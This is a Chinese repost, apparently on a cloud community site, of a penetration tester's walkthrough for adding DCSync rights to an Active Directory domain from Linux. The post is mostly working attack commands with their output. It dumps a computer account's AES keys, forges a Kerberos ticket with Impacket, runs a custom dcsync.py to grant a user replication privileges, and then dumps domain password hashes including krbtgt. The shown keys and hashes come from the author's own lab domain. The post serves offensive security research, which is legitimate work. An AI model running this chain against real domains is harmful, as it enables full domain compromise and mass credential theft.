从 Linux 添加 DCSync 权限
最近我在 BloodHound 中发现了一条如下所示的攻击路径:
我控制了一个计算机对象(一个 Exchange 服务器),它在域上有效地拥有 WriteDacl。
我也有一些限制:
- 所有系统都配置了 EDR
- 我只有计算机帐户的 AES 密钥,没有 NT 哈希或明文密码
您通常可以利用这一点的方法之一是使用 PowerView。出于各种原因,我想避免使用 PowerShell 或任何基于 Windows 的攻击性工具。我需要该工具能够使用 Kerberos 身份验证,因为我没有计算机帐户的密码或哈希。
我创建了一个专门使用 Python 来利用它的工具,它在很大程度上基于https://github.com/tothi/rbcd-attack,它在后台使用 Impacket 的ldapattack.py
这是我的攻击链的演练概述:
首先,获取计算机帐户的 AES 密钥。
$ python3 secretsdump.py server_admin@exchange.n00py.local
<SNIP>
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
N00PY\EXCHANGE$:aes256-cts-hmac-sha1-96:bfeaec0304d0f80a5e18c0955a75a4bc0bb02db298ebacc2a46309f405e3fccf
N00PY\EXCAHNGE$:aes128-cts-hmac-sha1-96:682e27594e62cefa9ce29af1a2fead20接下来,使用getTGT.py和 AES 密钥获取 Kerberos 票证。
$ python3 getTGT.py 'n00py.local/EXCHANGE$' -aesKey bfeaec0304d0f80a5e18c0955a75a4bc0bb02db298ebacc2a46309f405e3fccf
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation
[*] Saving ticket in EXCHANGE$.ccache
$ cp EXCHANGE\$.ccache /tmp/krb5cc_0
$ export KRB5CCNAME=/tmp/krb5cc_0获得票后运行新的花哨的所有基于 Python 的 DCSync 工具:https ://github.com/n00py/DCSync
$ python3 dcsync.py -dc 'dc01.n00py.local' -t 'CN=n00py,OU=Employees,DC=n00py,DC=local' 'n00py\\EXCHANGE$' -k
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation
[*] Starting DCSync Attack against CN=n00py,OU=Employees,DC=n00py,DC=local
[*] Initializing LDAP connection to dc01.n00py.local
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Querying domain security descriptor
[*] Success! User n00py now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20220119-152515.restore最后,使用secretsdump.py验证 privs
$ python3 secretsdump.py n00py@n00py.local
Impacket v0.9.24.dev1+20210917.161743.0297480b - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b0a29e52c261c4cdbb9812349eecc117:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1b50ad037ab355ce937540755c561a2c:::
n00py.local\n00py:1116:aad3b435b51404eeaad3b435b51404ee:2c261c4cd923429b0abb981e5eecc117:::
这个工具还没有办法自行清理,但我将来可能会添加。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
本文系转载,前往查看
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。